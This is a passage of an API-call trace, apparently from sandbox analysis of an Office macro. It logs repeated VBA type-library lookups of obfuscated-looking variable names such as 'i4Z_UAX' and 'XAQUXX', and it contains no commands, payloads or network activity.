pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i4Z_UAX") returned 0x102fb4 [0069.077] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="i4Z_UAX" | out: _Dst="i4Z_UAX") returned 0x0 [0069.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="i4Z_UAX") returned 8 [0069.077] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.077] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="i4Z_UAX", lHashVal=0x102fb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.077] IUnknown:Release (This=0x665ba50) returned 0xd [0069.077] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.078] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="i4Z_UAX", lHashVal=0x102fb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.078] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.078] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.078] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="i4Z_UAX", lHashVal=0x102fb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.078] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.078] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.078] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="i4Z_UAX", lHashVal=0x102fb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.078] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62296, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="i4Z_UAX") returned 8 [0069.078] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="i4Z_UAX", lHashVal=0x102fb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.078] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.078] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62296 | out: _Dst=0x67c2d40) returned 0x0 [0069.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_i4Z_UAX") returned 0x103338 [0069.078] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_i4Z_UAX" | out: _Dst="_B_var_i4Z_UAX") returned 0x0 [0069.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_i4Z_UAX") returned 15 [0069.078] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.078] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_i4Z_UAX", lHashVal=0x103338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.078] IUnknown:Release (This=0x665ba50) returned 0xd [0069.078] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.078] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_i4Z_UAX", lHashVal=0x103338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.078] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.078] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.078] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_i4Z_UAX", lHashVal=0x103338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.078] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.078] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.078] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_i4Z_UAX", lHashVal=0x103338, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.078] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.079] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.079] IUnknown:Release (This=0x665ba50) returned 0xd [0069.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10f4e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_i4Z_UAX") returned 15 [0069.079] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_i4Z_UAX", lHashVal=0x103338, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x55005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x55005f00000000, pDummy=0x0) returned 0x0 [0069.079] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62296 | out: _Dst=0x144ec0) returned 0x0 [0069.079] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QDAAA_", lHashVal=0x107759, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a622e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QDAAA_") returned 7 [0069.079] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QDAAA_", lHashVal=0x107759, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a622e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QDAAA_") returned 7 [0069.079] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QDAAA_", lHashVal=0x107759, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QDAAA_") returned 0x107759 [0069.079] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QDAAA_" | out: _Dst="QDAAA_") returned 0x0 [0069.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QDAAA_") returned 7 [0069.079] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.079] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QDAAA_", lHashVal=0x107759, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.080] IUnknown:Release (This=0x665ba50) returned 0xd [0069.080] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.080] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QDAAA_", lHashVal=0x107759, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.080] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.080] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.080] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QDAAA_", lHashVal=0x107759, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.080] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.080] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.080] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QDAAA_", lHashVal=0x107759, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.080] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a622e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QDAAA_") returned 7 [0069.080] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QDAAA_", lHashVal=0x107759, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.080] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.080] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a622e6 | out: _Dst=0x67c2d40) returned 0x0 [0069.080] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QDAAA_") returned 0x10f202 [0069.080] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QDAAA_" | out: _Dst="_B_var_QDAAA_") returned 0x0 [0069.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QDAAA_") returned 14 [0069.080] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.080] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QDAAA_", lHashVal=0x10f202, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.080] IUnknown:Release (This=0x665ba50) returned 0xd [0069.080] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.080] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QDAAA_", lHashVal=0x10f202, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.080] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.080] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.080] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QDAAA_", lHashVal=0x10f202, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.080] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.080] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.080] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QDAAA_", lHashVal=0x10f202, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.081] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.081] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.081] IUnknown:Release (This=0x665ba50) returned 0xd [0069.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10f7e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_QDAAA_") returned 14 [0069.081] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QDAAA_", lHashVal=0x10f202, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.081] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a622e6 | out: _Dst=0x144ec0) returned 0x0 [0069.081] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XAQUXX", lHashVal=0x102948, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a622be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XAQUXX") returned 7 [0069.081] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XAQUXX", lHashVal=0x102948, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a622be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XAQUXX") returned 7 [0069.081] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XAQUXX", lHashVal=0x102948, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.081] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAQUXX") returned 0x102948 [0069.081] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="XAQUXX" | out: _Dst="XAQUXX") returned 0x0 [0069.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="XAQUXX") returned 7 [0069.081] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.081] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XAQUXX", lHashVal=0x102948, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.081] IUnknown:Release (This=0x665ba50) returned 0xd [0069.081] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.081] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XAQUXX", lHashVal=0x102948, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.081] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.081] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.082] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XAQUXX", lHashVal=0x102948, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.082] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.082] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.082] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XAQUXX", lHashVal=0x102948, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.082] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a622be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XAQUXX") returned 7 [0069.082] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XAQUXX", lHashVal=0x102948, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.082] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.082] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a622be | out: _Dst=0x67c2d40) returned 0x0 [0069.082] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XAQUXX") returned 0x10a3f1 [0069.082] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_XAQUXX" | out: _Dst="_B_var_XAQUXX") returned 0x0 [0069.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_XAQUXX") returned 14 [0069.082] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.082] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XAQUXX", lHashVal=0x10a3f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.082] IUnknown:Release (This=0x665ba50) returned 0xd [0069.082] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.082] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XAQUXX", lHashVal=0x10a3f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.082] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.082] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.082] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XAQUXX", lHashVal=0x10a3f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.082] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.082] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.082] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XAQUXX", lHashVal=0x10a3f1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.082] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.082] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.082] IUnknown:Release (This=0x665ba50) returned 0xd [0069.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10fae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_XAQUXX") returned 14 [0069.082] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XAQUXX", lHashVal=0x10a3f1, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x58005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x58005500000000, pDummy=0x0) returned 0x0 [0069.083] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a622be | out: _Dst=0x144ec0) returned 0x0 [0069.083] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cDA_AAA", lHashVal=0x107192, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62336, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cDA_AAA") returned 8 [0069.083] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cDA_AAA", lHashVal=0x107192, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62336, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cDA_AAA") returned 8 [0069.083] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cDA_AAA", lHashVal=0x107192, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.083] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cDA_AAA") returned 0x107192 [0069.083] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="cDA_AAA" | out: _Dst="cDA_AAA") returned 0x0 [0069.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="cDA_AAA") returned 8 [0069.083] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.083] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cDA_AAA", lHashVal=0x107192, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.083] IUnknown:Release (This=0x665ba50) returned 0xd [0069.083] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.083] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cDA_AAA", lHashVal=0x107192, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.083] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.083] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.083] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cDA_AAA", lHashVal=0x107192, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.083] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.083] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.083] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cDA_AAA", lHashVal=0x107192, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.083] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62336, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cDA_AAA") returned 8 [0069.084] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cDA_AAA", lHashVal=0x107192, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.084] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.084] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62336 | out: _Dst=0x67c2d40) returned 0x0 [0069.084] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cDA_AAA") returned 0x107516 [0069.084] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_cDA_AAA" | out: _Dst="_B_var_cDA_AAA") returned 0x0 [0069.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_cDA_AAA") returned 15 [0069.084] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.084] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cDA_AAA", lHashVal=0x107516, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.084] IUnknown:Release (This=0x665ba50) returned 0xd [0069.084] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.084] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cDA_AAA", lHashVal=0x107516, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.084] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.084] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.084] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cDA_AAA", lHashVal=0x107516, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.084] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.084] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.084] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cDA_AAA", lHashVal=0x107516, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.084] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.084] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.084] IUnknown:Release (This=0x665ba50) returned 0xd [0069.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10fde, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_cDA_AAA") returned 15 [0069.084] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cDA_AAA", lHashVal=0x107516, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0) returned 0x0 [0069.085] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62336 | out: _Dst=0x144ec0) returned 0x0 [0069.085] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iwwCGCk", lHashVal=0x10020a, wFlags=0x3, ppTInfo=0x144cf8, 